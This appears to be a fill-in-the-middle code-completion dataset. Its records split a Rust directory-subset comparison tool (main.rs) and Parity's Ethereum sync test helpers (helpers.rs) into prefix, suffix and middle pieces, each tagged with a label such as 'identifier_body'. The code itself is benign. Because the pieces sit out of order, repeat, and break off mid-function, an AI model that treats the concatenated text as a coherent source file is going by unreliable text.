mod directory_comparable;
use directory_comparable::*;
/// The Docopt usage string
const USAGE: &'static str = "
Usage: subset [-q | -v] [-t | -n] [-b] <dir1> <dir2>
subset --help
subset lets you compare two directory structures.
We are going to check whether the files in dir1 are a subset of the files in dir2, regardless of directory structure.
We are going to check to see that every file under the directory structure in dir1 must be present somewhere in the dir2 directory structure, regardless of where in the directory structure or definitions of equality.
There are multiple definitions of file equality that you can specify using flags, but the default is a MD5 hash of the contents of the file. It is conceivable that you can define a custom equality strategy that relies on other parameters, such as file name, subdirectory location, metadata, EXIF data, etc. The possibilities are endless.
Common options:
-h, --help Show this usage message.
-q, --quiet Do not print all mappings.
-v, --verbose Print all mappings.
-t, --trivial Will swap out the MD5 comparison for a trivial comparison (everything is equal). (This is to test extensibility.)
-n, --name Will swap out the MD5 comparison for a filename comparison.
-b, --bidirectional Also check whether dir2 is also a subset of dir1 (essentially, set equality) and print out missing lists for both directories.
";
// We should think about moving away from DocOpt soon since it uses RustcDecodable,
// which is deprecated in favor of serde?
/// Parsing comand line arguments here
#[derive(Debug, Deserialize)]
struct Args {
arg_dir1: String,
arg_dir2: String,
flag_quiet: bool,
flag_verbose: bool,
flag_trivial: bool,
flag_name: bool,
flag_bidirectional: bool,
}
/// This should be the UI layer as much as possible-- it parses the command line arguments,
/// hands it off to our business logic, and then collects the answers back and print them.
fn main() {
let args: Args = Docopt::new(USAGE)
.and_then(|d| d.deserialize())
.unwrap_or_else(|e| e.exit());
println!("Comparing {} with {}", args.arg_dir1, args.arg_dir2);
// Make sure both of our inputs are valid directories
fs::read_dir(&args.arg_dir1).expect("Directory cannot be read!");
fs::read_dir(&args.arg_dir2).expect("Directory cannot be read!");
// Main logic: using dynamic dispatch
// (I don't feel too bad about boxing here because this is essentially a singleton.)
let mut program: Box<DirectoryComparable> = if args.flag_trivial {
Box::new(TrivialDirectoryComparable {})
} else if args.flag_name
|
else {
let md5_comparator = file_comparable::Md5Comparable::new();
Box::new(DirectoryComparableWithFileComparable::new(md5_comparator))
};
let superset_dirpath = PathBuf::from(&args.arg_dir2);
// eww... why do we have to coerce these Box types again?
// (again, only two of these Box types in existence so not so bad...)
let mut superset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&superset_dirpath));
let subset_dirpath = PathBuf::from(&args.arg_dir1);
let mut subset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&subset_dirpath)); // mut needed for.by_ref
if args.flag_bidirectional {
// Run program
let (subset_missing_result, superset_missing_result) =
program.report_missing_bidirectional(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in subset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}\n",
subset_missing_result.len(),
superset_dirpath.display()
);
for missing_file in superset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
subset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
superset_missing_result.len(),
subset_dirpath.display()
);
} else {
// Run program
let result = program.report_missing(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
result.len(),
superset_dirpath.display()
);
}
}
|
{
let filename_comparator = file_comparable::FileNameComparable::new();
Box::new(DirectoryComparableWithFileComparable::new(
filename_comparator,
))
}
|
conditional_block
|
main.rs
|
#[macro_use]
extern crate serde_derive;
extern crate docopt;
use docopt::Docopt;
use std::fs;
use std::path::PathBuf;
mod directory_files;
use directory_files::*;
mod file_comparable;
mod directory_comparable;
use directory_comparable::*;
/// The Docopt usage string
const USAGE: &'static str = "
Usage: subset [-q | -v] [-t | -n] [-b] <dir1> <dir2>
subset --help
subset lets you compare two directory structures.
We are going to check whether the files in dir1 are a subset of the files in dir2, regardless of directory structure.
We are going to check to see that every file under the directory structure in dir1 must be present somewhere in the dir2 directory structure, regardless of where in the directory structure or definitions of equality.
There are multiple definitions of file equality that you can specify using flags, but the default is a MD5 hash of the contents of the file. It is conceivable that you can define a custom equality strategy that relies on other parameters, such as file name, subdirectory location, metadata, EXIF data, etc. The possibilities are endless.
Common options:
-h, --help Show this usage message.
-q, --quiet Do not print all mappings.
-v, --verbose Print all mappings.
-t, --trivial Will swap out the MD5 comparison for a trivial comparison (everything is equal). (This is to test extensibility.)
-n, --name Will swap out the MD5 comparison for a filename comparison.
-b, --bidirectional Also check whether dir2 is also a subset of dir1 (essentially, set equality) and print out missing lists for both directories.
";
// We should think about moving away from DocOpt soon since it uses RustcDecodable,
// which is deprecated in favor of serde?
/// Parsing comand line arguments here
#[derive(Debug, Deserialize)]
struct Args {
arg_dir1: String,
arg_dir2: String,
flag_quiet: bool,
flag_verbose: bool,
flag_trivial: bool,
flag_name: bool,
flag_bidirectional: bool,
}
/// This should be the UI layer as much as possible-- it parses the command line arguments,
/// hands it off to our business logic, and then collects the answers back and print them.
fn main()
|
} else {
let md5_comparator = file_comparable::Md5Comparable::new();
Box::new(DirectoryComparableWithFileComparable::new(md5_comparator))
};
let superset_dirpath = PathBuf::from(&args.arg_dir2);
// eww... why do we have to coerce these Box types again?
// (again, only two of these Box types in existence so not so bad...)
let mut superset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&superset_dirpath));
let subset_dirpath = PathBuf::from(&args.arg_dir1);
let mut subset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&subset_dirpath)); // mut needed for.by_ref
if args.flag_bidirectional {
// Run program
let (subset_missing_result, superset_missing_result) =
program.report_missing_bidirectional(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in subset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}\n",
subset_missing_result.len(),
superset_dirpath.display()
);
for missing_file in superset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
subset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
superset_missing_result.len(),
subset_dirpath.display()
);
} else {
// Run program
let result = program.report_missing(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
result.len(),
superset_dirpath.display()
);
}
}
|
{
let args: Args = Docopt::new(USAGE)
.and_then(|d| d.deserialize())
.unwrap_or_else(|e| e.exit());
println!("Comparing {} with {}", args.arg_dir1, args.arg_dir2);
// Make sure both of our inputs are valid directories
fs::read_dir(&args.arg_dir1).expect("Directory cannot be read!");
fs::read_dir(&args.arg_dir2).expect("Directory cannot be read!");
// Main logic: using dynamic dispatch
// (I don't feel too bad about boxing here because this is essentially a singleton.)
let mut program: Box<DirectoryComparable> = if args.flag_trivial {
Box::new(TrivialDirectoryComparable {})
} else if args.flag_name {
let filename_comparator = file_comparable::FileNameComparable::new();
Box::new(DirectoryComparableWithFileComparable::new(
filename_comparator,
))
|
identifier_body
|
main.rs
|
#[macro_use]
extern crate serde_derive;
extern crate docopt;
use docopt::Docopt;
use std::fs;
use std::path::PathBuf;
mod directory_files;
use directory_files::*;
mod file_comparable;
|
use directory_comparable::*;
/// The Docopt usage string
const USAGE: &'static str = "
Usage: subset [-q | -v] [-t | -n] [-b] <dir1> <dir2>
subset --help
subset lets you compare two directory structures.
We are going to check whether the files in dir1 are a subset of the files in dir2, regardless of directory structure.
We are going to check to see that every file under the directory structure in dir1 must be present somewhere in the dir2 directory structure, regardless of where in the directory structure or definitions of equality.
There are multiple definitions of file equality that you can specify using flags, but the default is a MD5 hash of the contents of the file. It is conceivable that you can define a custom equality strategy that relies on other parameters, such as file name, subdirectory location, metadata, EXIF data, etc. The possibilities are endless.
Common options:
-h, --help Show this usage message.
-q, --quiet Do not print all mappings.
-v, --verbose Print all mappings.
-t, --trivial Will swap out the MD5 comparison for a trivial comparison (everything is equal). (This is to test extensibility.)
-n, --name Will swap out the MD5 comparison for a filename comparison.
-b, --bidirectional Also check whether dir2 is also a subset of dir1 (essentially, set equality) and print out missing lists for both directories.
";
// We should think about moving away from DocOpt soon since it uses RustcDecodable,
// which is deprecated in favor of serde?
/// Parsing comand line arguments here
#[derive(Debug, Deserialize)]
struct Args {
arg_dir1: String,
arg_dir2: String,
flag_quiet: bool,
flag_verbose: bool,
flag_trivial: bool,
flag_name: bool,
flag_bidirectional: bool,
}
/// This should be the UI layer as much as possible-- it parses the command line arguments,
/// hands it off to our business logic, and then collects the answers back and print them.
fn main() {
let args: Args = Docopt::new(USAGE)
.and_then(|d| d.deserialize())
.unwrap_or_else(|e| e.exit());
println!("Comparing {} with {}", args.arg_dir1, args.arg_dir2);
// Make sure both of our inputs are valid directories
fs::read_dir(&args.arg_dir1).expect("Directory cannot be read!");
fs::read_dir(&args.arg_dir2).expect("Directory cannot be read!");
// Main logic: using dynamic dispatch
// (I don't feel too bad about boxing here because this is essentially a singleton.)
let mut program: Box<DirectoryComparable> = if args.flag_trivial {
Box::new(TrivialDirectoryComparable {})
} else if args.flag_name {
let filename_comparator = file_comparable::FileNameComparable::new();
Box::new(DirectoryComparableWithFileComparable::new(
filename_comparator,
))
} else {
let md5_comparator = file_comparable::Md5Comparable::new();
Box::new(DirectoryComparableWithFileComparable::new(md5_comparator))
};
let superset_dirpath = PathBuf::from(&args.arg_dir2);
// eww... why do we have to coerce these Box types again?
// (again, only two of these Box types in existence so not so bad...)
let mut superset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&superset_dirpath));
let subset_dirpath = PathBuf::from(&args.arg_dir1);
let mut subset_iter: Box<Iterator<Item = PathBuf>> =
Box::new(DirectoryFiles::new(&subset_dirpath)); // mut needed for.by_ref
if args.flag_bidirectional {
// Run program
let (subset_missing_result, superset_missing_result) =
program.report_missing_bidirectional(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in subset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}\n",
subset_missing_result.len(),
superset_dirpath.display()
);
for missing_file in superset_missing_result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
subset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
superset_missing_result.len(),
subset_dirpath.display()
);
} else {
// Run program
let result = program.report_missing(&mut subset_iter, &mut superset_iter);
// View layer (printing)
for missing_file in result.iter() {
println!(
"Could not find {} in {}",
missing_file.display(),
superset_dirpath.display()
);
}
println!(
"\nWe are missing {} files in {}",
result.len(),
superset_dirpath.display()
);
}
}
|
mod directory_comparable;
|
random_line_split
|
helpers.rs
|
// Copyright 2015, 2016 Ethcore (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use util::*;
use network::*;
use tests::snapshot::*;
use ethcore::client::{TestBlockChainClient, BlockChainClient};
use ethcore::header::BlockNumber;
use ethcore::snapshot::SnapshotService;
use sync_io::SyncIo;
use api::WARP_SYNC_PROTOCOL_ID;
use chain::ChainSync;
use ::SyncConfig;
pub struct TestIo<'p> {
pub chain: &'p mut TestBlockChainClient,
pub snapshot_service: &'p TestSnapshotService,
pub queue: &'p mut VecDeque<TestPacket>,
pub sender: Option<PeerId>,
pub to_disconnect: HashSet<PeerId>,
overlay: RwLock<HashMap<BlockNumber, Bytes>>,
}
impl<'p> TestIo<'p> {
pub fn new(chain: &'p mut TestBlockChainClient, ss: &'p TestSnapshotService, queue: &'p mut VecDeque<TestPacket>, sender: Option<PeerId>) -> TestIo<'p> {
TestIo {
chain: chain,
snapshot_service: ss,
queue: queue,
sender: sender,
to_disconnect: HashSet::new(),
overlay: RwLock::new(HashMap::new()),
}
}
}
impl<'p> SyncIo for TestIo<'p> {
fn disable_peer(&mut self, peer_id: PeerId) {
self.disconnect_peer(peer_id);
}
fn disconnect_peer(&mut self, peer_id: PeerId) {
self.to_disconnect.insert(peer_id);
}
fn is_expired(&self) -> bool {
false
}
fn respond(&mut self, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: self.sender.unwrap()
});
Ok(())
}
fn
|
(&mut self, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: peer_id,
});
Ok(())
}
fn send_protocol(&mut self, _protocol: ProtocolId, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.send(peer_id, packet_id, data)
}
fn chain(&self) -> &BlockChainClient {
self.chain
}
fn snapshot_service(&self) -> &SnapshotService {
self.snapshot_service
}
fn peer_session_info(&self, _peer_id: PeerId) -> Option<SessionInfo> {
None
}
fn eth_protocol_version(&self, _peer: PeerId) -> u8 {
63
}
fn protocol_version(&self, protocol: &ProtocolId, peer_id: PeerId) -> u8 {
if protocol == &WARP_SYNC_PROTOCOL_ID { 1 } else { self.eth_protocol_version(peer_id) }
}
fn chain_overlay(&self) -> &RwLock<HashMap<BlockNumber, Bytes>> {
&self.overlay
}
}
pub struct TestPacket {
pub data: Bytes,
pub packet_id: PacketId,
pub recipient: PeerId,
}
pub struct TestPeer {
pub chain: TestBlockChainClient,
pub snapshot_service: Arc<TestSnapshotService>,
pub sync: RwLock<ChainSync>,
pub queue: VecDeque<TestPacket>,
}
pub struct TestNet {
pub peers: Vec<TestPeer>,
pub started: bool,
}
impl TestNet {
pub fn new(n: usize) -> TestNet {
Self::new_with_fork(n, None)
}
pub fn new_with_fork(n: usize, fork: Option<(BlockNumber, H256)>) -> TestNet {
let mut net = TestNet {
peers: Vec::new(),
started: false,
};
for _ in 0..n {
let chain = TestBlockChainClient::new();
let mut config = SyncConfig::default();
config.fork_block = fork;
let ss = Arc::new(TestSnapshotService::new());
let sync = ChainSync::new(config, &chain);
net.peers.push(TestPeer {
sync: RwLock::new(sync),
snapshot_service: ss,
chain: chain,
queue: VecDeque::new(),
});
}
net
}
pub fn peer(&self, i: usize) -> &TestPeer {
self.peers.get(i).unwrap()
}
pub fn peer_mut(&mut self, i: usize) -> &mut TestPeer {
self.peers.get_mut(i).unwrap()
}
pub fn start(&mut self) {
for peer in 0..self.peers.len() {
for client in 0..self.peers.len() {
if peer!= client {
let mut p = self.peers.get_mut(peer).unwrap();
p.sync.write().restart(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)));
p.sync.write().on_peer_connected(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)), client as PeerId);
}
}
}
}
pub fn sync_step(&mut self) {
for peer in 0..self.peers.len() {
if let Some(packet) = self.peers[peer].queue.pop_front() {
let disconnecting = {
let mut p = self.peers.get_mut(packet.recipient).unwrap();
trace!("--- {} -> {} ---", peer, packet.recipient);
let to_disconnect = {
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
ChainSync::dispatch_packet(&p.sync, &mut io, peer as PeerId, packet.packet_id, &packet.data);
io.to_disconnect
};
for d in &to_disconnect {
// notify this that disconnecting peers are disconnecting
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(*d));
p.sync.write().on_peer_aborting(&mut io, *d);
}
to_disconnect
};
for d in &disconnecting {
// notify other peers that this peer is disconnecting
let mut p = self.peers.get_mut(*d).unwrap();
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
p.sync.write().on_peer_aborting(&mut io, peer as PeerId);
}
}
self.sync_step_peer(peer);
}
}
pub fn sync_step_peer(&mut self, peer_num: usize) {
let mut peer = self.peer_mut(peer_num);
peer.sync.write().maintain_sync(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn restart_peer(&mut self, i: usize) {
let peer = self.peer_mut(i);
peer.sync.write().restart(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn sync(&mut self) -> u32 {
self.start();
let mut total_steps = 0;
while!self.done() {
self.sync_step();
total_steps += 1;
}
total_steps
}
pub fn sync_steps(&mut self, count: usize) {
if!self.started {
self.start();
self.started = true;
}
for _ in 0..count {
self.sync_step();
}
}
pub fn done(&self) -> bool {
self.peers.iter().all(|p| p.queue.is_empty())
}
pub fn trigger_chain_new_blocks(&mut self, peer_id: usize) {
let mut peer = self.peer_mut(peer_id);
peer.sync.write().chain_new_blocks(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None), &[], &[], &[], &[], &[]);
}
}
|
send
|
identifier_name
|
helpers.rs
|
// Copyright 2015, 2016 Ethcore (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use util::*;
use network::*;
use tests::snapshot::*;
use ethcore::client::{TestBlockChainClient, BlockChainClient};
use ethcore::header::BlockNumber;
use ethcore::snapshot::SnapshotService;
use sync_io::SyncIo;
use api::WARP_SYNC_PROTOCOL_ID;
use chain::ChainSync;
use ::SyncConfig;
pub struct TestIo<'p> {
pub chain: &'p mut TestBlockChainClient,
pub snapshot_service: &'p TestSnapshotService,
|
pub queue: &'p mut VecDeque<TestPacket>,
pub sender: Option<PeerId>,
pub to_disconnect: HashSet<PeerId>,
overlay: RwLock<HashMap<BlockNumber, Bytes>>,
}
impl<'p> TestIo<'p> {
pub fn new(chain: &'p mut TestBlockChainClient, ss: &'p TestSnapshotService, queue: &'p mut VecDeque<TestPacket>, sender: Option<PeerId>) -> TestIo<'p> {
TestIo {
chain: chain,
snapshot_service: ss,
queue: queue,
sender: sender,
to_disconnect: HashSet::new(),
overlay: RwLock::new(HashMap::new()),
}
}
}
impl<'p> SyncIo for TestIo<'p> {
fn disable_peer(&mut self, peer_id: PeerId) {
self.disconnect_peer(peer_id);
}
fn disconnect_peer(&mut self, peer_id: PeerId) {
self.to_disconnect.insert(peer_id);
}
fn is_expired(&self) -> bool {
false
}
fn respond(&mut self, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: self.sender.unwrap()
});
Ok(())
}
fn send(&mut self, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: peer_id,
});
Ok(())
}
fn send_protocol(&mut self, _protocol: ProtocolId, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.send(peer_id, packet_id, data)
}
fn chain(&self) -> &BlockChainClient {
self.chain
}
fn snapshot_service(&self) -> &SnapshotService {
self.snapshot_service
}
fn peer_session_info(&self, _peer_id: PeerId) -> Option<SessionInfo> {
None
}
fn eth_protocol_version(&self, _peer: PeerId) -> u8 {
63
}
fn protocol_version(&self, protocol: &ProtocolId, peer_id: PeerId) -> u8 {
if protocol == &WARP_SYNC_PROTOCOL_ID { 1 } else { self.eth_protocol_version(peer_id) }
}
fn chain_overlay(&self) -> &RwLock<HashMap<BlockNumber, Bytes>> {
&self.overlay
}
}
pub struct TestPacket {
pub data: Bytes,
pub packet_id: PacketId,
pub recipient: PeerId,
}
pub struct TestPeer {
pub chain: TestBlockChainClient,
pub snapshot_service: Arc<TestSnapshotService>,
pub sync: RwLock<ChainSync>,
pub queue: VecDeque<TestPacket>,
}
pub struct TestNet {
pub peers: Vec<TestPeer>,
pub started: bool,
}
impl TestNet {
pub fn new(n: usize) -> TestNet {
Self::new_with_fork(n, None)
}
pub fn new_with_fork(n: usize, fork: Option<(BlockNumber, H256)>) -> TestNet {
let mut net = TestNet {
peers: Vec::new(),
started: false,
};
for _ in 0..n {
let chain = TestBlockChainClient::new();
let mut config = SyncConfig::default();
config.fork_block = fork;
let ss = Arc::new(TestSnapshotService::new());
let sync = ChainSync::new(config, &chain);
net.peers.push(TestPeer {
sync: RwLock::new(sync),
snapshot_service: ss,
chain: chain,
queue: VecDeque::new(),
});
}
net
}
pub fn peer(&self, i: usize) -> &TestPeer {
self.peers.get(i).unwrap()
}
pub fn peer_mut(&mut self, i: usize) -> &mut TestPeer {
self.peers.get_mut(i).unwrap()
}
pub fn start(&mut self) {
for peer in 0..self.peers.len() {
for client in 0..self.peers.len() {
if peer!= client {
let mut p = self.peers.get_mut(peer).unwrap();
p.sync.write().restart(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)));
p.sync.write().on_peer_connected(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)), client as PeerId);
}
}
}
}
pub fn sync_step(&mut self) {
for peer in 0..self.peers.len() {
if let Some(packet) = self.peers[peer].queue.pop_front() {
let disconnecting = {
let mut p = self.peers.get_mut(packet.recipient).unwrap();
trace!("--- {} -> {} ---", peer, packet.recipient);
let to_disconnect = {
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
ChainSync::dispatch_packet(&p.sync, &mut io, peer as PeerId, packet.packet_id, &packet.data);
io.to_disconnect
};
for d in &to_disconnect {
// notify this that disconnecting peers are disconnecting
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(*d));
p.sync.write().on_peer_aborting(&mut io, *d);
}
to_disconnect
};
for d in &disconnecting {
// notify other peers that this peer is disconnecting
let mut p = self.peers.get_mut(*d).unwrap();
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
p.sync.write().on_peer_aborting(&mut io, peer as PeerId);
}
}
self.sync_step_peer(peer);
}
}
pub fn sync_step_peer(&mut self, peer_num: usize) {
let mut peer = self.peer_mut(peer_num);
peer.sync.write().maintain_sync(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn restart_peer(&mut self, i: usize) {
let peer = self.peer_mut(i);
peer.sync.write().restart(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn sync(&mut self) -> u32 {
self.start();
let mut total_steps = 0;
while!self.done() {
self.sync_step();
total_steps += 1;
}
total_steps
}
pub fn sync_steps(&mut self, count: usize) {
if!self.started {
self.start();
self.started = true;
}
for _ in 0..count {
self.sync_step();
}
}
pub fn done(&self) -> bool {
self.peers.iter().all(|p| p.queue.is_empty())
}
pub fn trigger_chain_new_blocks(&mut self, peer_id: usize) {
let mut peer = self.peer_mut(peer_id);
peer.sync.write().chain_new_blocks(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None), &[], &[], &[], &[], &[]);
}
}
|
random_line_split
|
|
helpers.rs
|
// Copyright 2015, 2016 Ethcore (UK) Ltd.
// This file is part of Parity.
// Parity is free software: you can redistribute it and/or modify
// it under the terms of the GNU General Public License as published by
// the Free Software Foundation, either version 3 of the License, or
// (at your option) any later version.
// Parity is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
// You should have received a copy of the GNU General Public License
// along with Parity. If not, see <http://www.gnu.org/licenses/>.
use util::*;
use network::*;
use tests::snapshot::*;
use ethcore::client::{TestBlockChainClient, BlockChainClient};
use ethcore::header::BlockNumber;
use ethcore::snapshot::SnapshotService;
use sync_io::SyncIo;
use api::WARP_SYNC_PROTOCOL_ID;
use chain::ChainSync;
use ::SyncConfig;
pub struct TestIo<'p> {
pub chain: &'p mut TestBlockChainClient,
pub snapshot_service: &'p TestSnapshotService,
pub queue: &'p mut VecDeque<TestPacket>,
pub sender: Option<PeerId>,
pub to_disconnect: HashSet<PeerId>,
overlay: RwLock<HashMap<BlockNumber, Bytes>>,
}
impl<'p> TestIo<'p> {
pub fn new(chain: &'p mut TestBlockChainClient, ss: &'p TestSnapshotService, queue: &'p mut VecDeque<TestPacket>, sender: Option<PeerId>) -> TestIo<'p> {
TestIo {
chain: chain,
snapshot_service: ss,
queue: queue,
sender: sender,
to_disconnect: HashSet::new(),
overlay: RwLock::new(HashMap::new()),
}
}
}
impl<'p> SyncIo for TestIo<'p> {
fn disable_peer(&mut self, peer_id: PeerId) {
self.disconnect_peer(peer_id);
}
fn disconnect_peer(&mut self, peer_id: PeerId) {
self.to_disconnect.insert(peer_id);
}
fn is_expired(&self) -> bool {
false
}
fn respond(&mut self, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: self.sender.unwrap()
});
Ok(())
}
fn send(&mut self, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.queue.push_back(TestPacket {
data: data,
packet_id: packet_id,
recipient: peer_id,
});
Ok(())
}
fn send_protocol(&mut self, _protocol: ProtocolId, peer_id: PeerId, packet_id: PacketId, data: Vec<u8>) -> Result<(), NetworkError> {
self.send(peer_id, packet_id, data)
}
fn chain(&self) -> &BlockChainClient {
self.chain
}
fn snapshot_service(&self) -> &SnapshotService {
self.snapshot_service
}
fn peer_session_info(&self, _peer_id: PeerId) -> Option<SessionInfo> {
None
}
fn eth_protocol_version(&self, _peer: PeerId) -> u8 {
63
}
fn protocol_version(&self, protocol: &ProtocolId, peer_id: PeerId) -> u8 {
if protocol == &WARP_SYNC_PROTOCOL_ID
|
else { self.eth_protocol_version(peer_id) }
}
fn chain_overlay(&self) -> &RwLock<HashMap<BlockNumber, Bytes>> {
&self.overlay
}
}
pub struct TestPacket {
pub data: Bytes,
pub packet_id: PacketId,
pub recipient: PeerId,
}
pub struct TestPeer {
pub chain: TestBlockChainClient,
pub snapshot_service: Arc<TestSnapshotService>,
pub sync: RwLock<ChainSync>,
pub queue: VecDeque<TestPacket>,
}
pub struct TestNet {
pub peers: Vec<TestPeer>,
pub started: bool,
}
impl TestNet {
pub fn new(n: usize) -> TestNet {
Self::new_with_fork(n, None)
}
pub fn new_with_fork(n: usize, fork: Option<(BlockNumber, H256)>) -> TestNet {
let mut net = TestNet {
peers: Vec::new(),
started: false,
};
for _ in 0..n {
let chain = TestBlockChainClient::new();
let mut config = SyncConfig::default();
config.fork_block = fork;
let ss = Arc::new(TestSnapshotService::new());
let sync = ChainSync::new(config, &chain);
net.peers.push(TestPeer {
sync: RwLock::new(sync),
snapshot_service: ss,
chain: chain,
queue: VecDeque::new(),
});
}
net
}
pub fn peer(&self, i: usize) -> &TestPeer {
self.peers.get(i).unwrap()
}
pub fn peer_mut(&mut self, i: usize) -> &mut TestPeer {
self.peers.get_mut(i).unwrap()
}
pub fn start(&mut self) {
for peer in 0..self.peers.len() {
for client in 0..self.peers.len() {
if peer!= client {
let mut p = self.peers.get_mut(peer).unwrap();
p.sync.write().restart(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)));
p.sync.write().on_peer_connected(&mut TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(client as PeerId)), client as PeerId);
}
}
}
}
pub fn sync_step(&mut self) {
for peer in 0..self.peers.len() {
if let Some(packet) = self.peers[peer].queue.pop_front() {
let disconnecting = {
let mut p = self.peers.get_mut(packet.recipient).unwrap();
trace!("--- {} -> {} ---", peer, packet.recipient);
let to_disconnect = {
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
ChainSync::dispatch_packet(&p.sync, &mut io, peer as PeerId, packet.packet_id, &packet.data);
io.to_disconnect
};
for d in &to_disconnect {
// notify this that disconnecting peers are disconnecting
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(*d));
p.sync.write().on_peer_aborting(&mut io, *d);
}
to_disconnect
};
for d in &disconnecting {
// notify other peers that this peer is disconnecting
let mut p = self.peers.get_mut(*d).unwrap();
let mut io = TestIo::new(&mut p.chain, &p.snapshot_service, &mut p.queue, Some(peer as PeerId));
p.sync.write().on_peer_aborting(&mut io, peer as PeerId);
}
}
self.sync_step_peer(peer);
}
}
pub fn sync_step_peer(&mut self, peer_num: usize) {
let mut peer = self.peer_mut(peer_num);
peer.sync.write().maintain_sync(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn restart_peer(&mut self, i: usize) {
let peer = self.peer_mut(i);
peer.sync.write().restart(&mut TestIo::new(&mut peer.chain, &peer.snapshot_service, &mut peer.queue, None));
}
pub fn sync(&mut self) -> u32 {
self.start();
let mut total_steps = 0;
while!self.done() {
self.sync_step();
total_steps += 1;
}
total_steps
}
pub fn sync_steps(&mut self, count: usize) {
if!self.started {
self.start();
self.started = true;
}
for _ in 0..count {
self.sync_step();
}
}
pub fn done(&self) -> bool {
self.peers.iter().all(|p| p.queue.is_empty())
}
